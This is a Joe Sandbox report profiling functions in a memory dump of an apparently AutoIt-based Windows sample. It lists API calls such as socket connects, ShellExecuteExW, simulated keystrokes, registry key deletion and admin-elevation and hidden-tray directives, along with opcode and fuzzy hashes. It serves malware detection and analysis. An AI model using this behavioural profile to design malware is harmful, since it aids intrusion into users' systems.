Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: df780d2110f67a7ea57a8233dd9e8d4bda7dcb85f111a8428c0c14c6609f3292
Instruction ID: ada94b0e206bc9a9516ecc08fb22eb4403b05164d8fbb95931f7ae23940198db
Opcode Fuzzy Hash: df780d2110f67a7ea57a8233dd9e8d4bda7dcb85f111a8428c0c14c6609f3292
Instruction Fuzzy Hash: FF2125766307167E9A00B9209D42FBF736C9E39745B240021FD02B6A42F770DF39CAA8

Function 0026F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

Part of subcall function 0021436A: _wcscpy.LIBCMT ref: 0021438D

_wcstok.LIBCMT ref: 0026F2D7
_wcscpy.LIBCMT ref: 0026F366
_memset.LIBCMT ref: 0026F399

Strings

X, xrefs: 0026F3D6

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 33cb010c6bb155a6eba2a5ceeebb636b537e572a42427763f51a7a198b87009c
Instruction ID: f00eb40eb5ecc5999bef4834161b9b6fe069f64ac9db79ba5fc10ec9c8457c29
Opcode Fuzzy Hash: 33cb010c6bb155a6eba2a5ceeebb636b537e572a42427763f51a7a198b87009c
Instruction Fuzzy Hash: 88C1BF715243419FCB64EF64D981A9BB7E4BF84350F00492DF999872A2DB30EDA5CF82

Function 002771EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002772EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0027730C
WSAGetLastError.WSOCK32(00000000), ref: 0027731F
htons.WSOCK32(?,?,?,00000000,?), ref: 002773D5
inet_ntoa.WSOCK32(?), ref: 00277392

Part of subcall function 0025B4EA: _strlen.LIBCMT ref: 0025B4F4
Part of subcall function 0025B4EA: _memmove.LIBCMT ref: 0025B516

_strlen.LIBCMT ref: 0027742F
_memmove.LIBCMT ref: 00277498

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: bc016403988eb5b52aad806e97bcaaa327a14c00bbb9d8753d811f63cec87d0f
Instruction ID: c7597e655f807920abbe11000466982d7af33b07ca44f8a85a59f33b0bb61652
Opcode Fuzzy Hash: bc016403988eb5b52aad806e97bcaaa327a14c00bbb9d8753d811f63cec87d0f
Instruction Fuzzy Hash: AA81C071228301AFC310EF24DC95E6BB7E8AF94714F108519FA599B2E2DA70DD61CF92

Function 00201800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0389b956dbb2ff20ede19243803e4a70fbe0f88a2ea2a18b0b1d9c84a5a84244
Instruction ID: a60f7284ebb5cd2fe5d41a00485d3aa14da1d5f497eb943b52be88b9bf42c897
Opcode Fuzzy Hash: 0389b956dbb2ff20ede19243803e4a70fbe0f88a2ea2a18b0b1d9c84a5a84244
Instruction Fuzzy Hash: 93715E70910609EFDB05CF58CC89EBEBB79FF85314F148159F915AA292C7309A61CFA0

Function 0028B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01525440), ref: 0028BA5D
IsWindowEnabled.USER32(01525440), ref: 0028BA69
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0028BB4D
SendMessageW.USER32(01525440,000000B0,?,?), ref: 0028BB84
IsDlgButtonChecked.USER32(?,?), ref: 0028BBC1
GetWindowLongW.USER32(01525440,000000EC), ref: 0028BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0028BBFB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 1270de0a186c021a1236b18535350e99f667b8f95b36fce98947ecf1e48a369a
Instruction ID: 7cc0a9fb9b5d08df3e37d870422c5a188c865f2d2e71c2160ea7797844ad28f1
Opcode Fuzzy Hash: 1270de0a186c021a1236b18535350e99f667b8f95b36fce98947ecf1e48a369a
Instruction Fuzzy Hash: 2971A338A26206AFDB26AF54C8D8FBAB7B9EF49300F14405DE955972E1C731AC60DF50

Function 0027FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027FB31
_memset.LIBCMT ref: 0027FBFA
ShellExecuteExW.SHELL32(?), ref: 0027FC3F

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

Part of subcall function 0021436A: _wcscpy.LIBCMT ref: 0021438D

GetProcessId.KERNEL32(00000000), ref: 0027FCB6
CloseHandle.KERNEL32(00000000), ref: 0027FCE5

Strings

@, xrefs: 0027FC0E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 408e73b0042244fc0376625f6dedf53a097d25d06ae96ffea2c0f061a4195389
Instruction ID: dfd83f5cfdb2e8194b6a04346d3a131713a6259bdc24c48443694c1d62ad4892
Opcode Fuzzy Hash: 408e73b0042244fc0376625f6dedf53a097d25d06ae96ffea2c0f061a4195389
Instruction Fuzzy Hash: 2561BFB5A10619DFCB11EF94C5909AEB7F4FF48314B10C46AE819AB391CB30AD61CF90

Function 0026174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0026178B
GetKeyboardState.USER32(?), ref: 002617A0
SetKeyboardState.USER32(?), ref: 00261801
PostMessageW.USER32(?,00000101,00000010,?), ref: 0026182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 0026184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00261894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 002618B7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 47fcd0d711adc37086135797d9a196897daa8d09ea0dcee48ef93270733e4b49
Instruction ID: 7c8a2807a0c6ed0e67f32911701967ec28d7fed9fd4e79e74c1f2e539b4e6f6f
Opcode Fuzzy Hash: 47fcd0d711adc37086135797d9a196897daa8d09ea0dcee48ef93270733e4b49
Instruction Fuzzy Hash: E351C360A287D63DFB364A24C855BBABEE95B06300F0C8589E1D5468D2C398BCF4D750

Function 00261565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 002615A4
GetKeyboardState.USER32(?), ref: 002615B9
SetKeyboardState.USER32(?), ref: 0026161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00261646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00261663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002616A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002616C8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ac4bec278b2c974f34ec9bb3a72e16556bf60c10b8d70c5fdde2ed4fe786e178
Instruction ID: 76b77c2772dec5e0a4ffaf5f180d295ebaf44cb1cc23c9ed4ec755b11f10f708
Opcode Fuzzy Hash: ac4bec278b2c974f34ec9bb3a72e16556bf60c10b8d70c5fdde2ed4fe786e178
Instruction Fuzzy Hash: AC5106A09647D63DFB328B24CC45BBABEAD5B05300F0C8489E1D5469C2C694FCF4EB50

Function 00265BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00265BC5
_wcsncpy.LIBCMT ref: 00265BFA
_wcsncpy.LIBCMT ref: 00265C2C
_wcsncpy.LIBCMT ref: 00265C5F
_wcsncpy.LIBCMT ref: 00265CA1
_wcsncpy.LIBCMT ref: 00265CDB
_wcsncpy.LIBCMT ref: 00265D0A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 2c3de0d3c7c71eaa85b88783f3558057402bb173eb0bbee5e828ba7ec6334d5f
Instruction ID: d185490d2d6ca1d477916d9a9529618ad46b2c85e565f745f6b4f27c575845ec
Opcode Fuzzy Hash: 2c3de0d3c7c71eaa85b88783f3558057402bb173eb0bbee5e828ba7ec6334d5f
Instruction Fuzzy Hash: 3C41B165C30628B5CB11FBF4DC86ACFB3B99F04310F114956F909E3151E634A369CBA5

Function 00263B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00264BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00263B8A,?), ref: 00264BE0

Part of subcall function 00264BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00263B8A,?), ref: 00264BF9

lstrcmpiW.KERNEL32(?,?), ref: 00263BAA
_wcscmp.LIBCMT ref: 00263BC6
MoveFileW.KERNEL32(?,?), ref: 00263BDE
_wcscat.LIBCMT ref: 00263C26
SHFileOperationW.SHELL32(?), ref: 00263C92

Strings

\*.*, xrefs: 00263C20

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: f600c5a95c78c1d36d2dba01475a0738350ea3b360c8ad744070949237218a43
Instruction ID: 2d2a421c3047d7c329001890809630673158103120d5a57fe079729483474a5f
Opcode Fuzzy Hash: f600c5a95c78c1d36d2dba01475a0738350ea3b360c8ad744070949237218a43
Instruction Fuzzy Hash: FB418E7142C345AAC752EF64D485ADBB7E8AF88380F40192EF489C3151EB34D698CB52

Function 002878B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002878CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00287976
IsMenu.USER32(?), ref: 0028798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002879D6
DrawMenuBar.USER32 ref: 002879E9

Strings

0, xrefs: 002878C3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 214a344ad87125506e6c26f50bc365032f1c28c2c173a07aeaa28a2cf3eca000
Instruction ID: d126c10bec937ed1bab47ec4332332eebf9651bc27c74f8865581b3147e581b1
Opcode Fuzzy Hash: 214a344ad87125506e6c26f50bc365032f1c28c2c173a07aeaa28a2cf3eca000
Instruction Fuzzy Hash: 3A415C79A15209EFDB10EF54E888E9ABBF5FF05310F148129E95997290C770ED60DFA0

Function 00281602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00281631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028165B
FreeLibrary.KERNEL32(00000000), ref: 00281712

Part of subcall function 00281602: RegCloseKey.ADVAPI32(?), ref: 00281678
Part of subcall function 00281602: FreeLibrary.KERNEL32(?), ref: 002816CA
Part of subcall function 00281602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002816ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 002816B5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 14b051505ef33238f04b3bc7f31ee73f2feb00f9eed6f3eb41a1693a77f778d5
Instruction ID: ee2569b5972575ff701770a2b701666cd8729997329d1f1d9b80b8a9a81fc0cb
Opcode Fuzzy Hash: 14b051505ef33238f04b3bc7f31ee73f2feb00f9eed6f3eb41a1693a77f778d5
Instruction Fuzzy Hash: 95313EB591211DBFDB149F90DC89EFEB7BCEF08300F04016AE515A2190EB749E669BA0

Function 002868F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00286911
GetWindowLongW.USER32(01525440,000000F0), ref: 00286944
GetWindowLongW.USER32(01525440,000000F0), ref: 00286979
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002869AB
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002869D5
GetWindowLongW.USER32(00000000,000000F0), ref: 002869E6
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00286A00

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 69badf4f740948b100b981a8c2e6c18179c035d21a09facb14b5e2a522c97948
Instruction ID: b4b4901c538e89c13a15b3bf087be00b76b890eb7a05f413d017f234cc31d588
Opcode Fuzzy Hash: 69badf4f740948b100b981a8c2e6c18179c035d21a09facb14b5e2a522c97948
Instruction Fuzzy Hash: 0E312279615156AFDB20DF18EC8CF6437E5EB4A310F1902A4FA248B2E1CB72AC60DF41

Function 0025E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0025E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0025E2F0
SysAllocString.OLEAUT32(00000000), ref: 0025E2F3
SysAllocString.OLEAUT32(?), ref: 0025E311
SysFreeString.OLEAUT32(?), ref: 0025E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 0025E33F
SysAllocString.OLEAUT32(?), ref: 0025E34D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 56bdc7f8888ec709c506a3069654eea6ec3911d025bc7a14d6fd8a7e999a6346
Instruction ID: c32b8ead097e32233932390380cfe69ce0c2d32d36b6376ba67640b11110dde1
Opcode Fuzzy Hash: 56bdc7f8888ec709c506a3069654eea6ec3911d025bc7a14d6fd8a7e999a6346
Instruction Fuzzy Hash: C721B27261021EBF9F14DFA8DC88CBB73ACEB08360B058166FE58DB250D670ED458B64

Function 0027685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00278475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002784A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002768B1
WSAGetLastError.WSOCK32(00000000), ref: 002768C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002768F9
connect.WSOCK32(00000000,?,00000010), ref: 00276902
WSAGetLastError.WSOCK32 ref: 0027690C
closesocket.WSOCK32(00000000), ref: 00276935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0027694E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 4c4f6db4651dab785562b9ec23a9dcbc0037dbc5d2f535a31f4f838567f7c299
Instruction ID: 4e5f25920c4a9795dbaf9fcddb8714ec85d8fc42f4ad59c412343e0454dbecb3
Opcode Fuzzy Hash: 4c4f6db4651dab785562b9ec23a9dcbc0037dbc5d2f535a31f4f838567f7c299
Instruction Fuzzy Hash: 0A31C471220619AFDB10AF64DC89FBE77B9EF44721F048119F909A7291CB70AC148FA1

Function 0025E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0025E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0025E3CB
SysAllocString.OLEAUT32(00000000), ref: 0025E3CE
SysAllocString.OLEAUT32 ref: 0025E3EF
SysFreeString.OLEAUT32 ref: 0025E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 0025E412
SysAllocString.OLEAUT32(?), ref: 0025E420

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0f0ff8401a923174dfc3e5fbb05d0554d35c686fab1c5e29fc89f4ff4144e986
Instruction ID: 781dfbfcc6aadfff779072ec801472490130487ac63512295379735ddee8d983
Opcode Fuzzy Hash: 0f0ff8401a923174dfc3e5fbb05d0554d35c686fab1c5e29fc89f4ff4144e986
Instruction Fuzzy Hash: 0F21B632614209BFAF149FA8ECC8CBE77ECEB08361B018165FD15CB260D670ED558B68

Function 0025FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0025FE2C
__wcsnicmp.LIBCMT ref: 0025FE4D
__wcsnicmp.LIBCMT ref: 0025FE67

Strings

#OnAutoItStartRegister, xrefs: 0025FE61
#notrayicon, xrefs: 0025FE24
#requireadmin, xrefs: 0025FE47

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
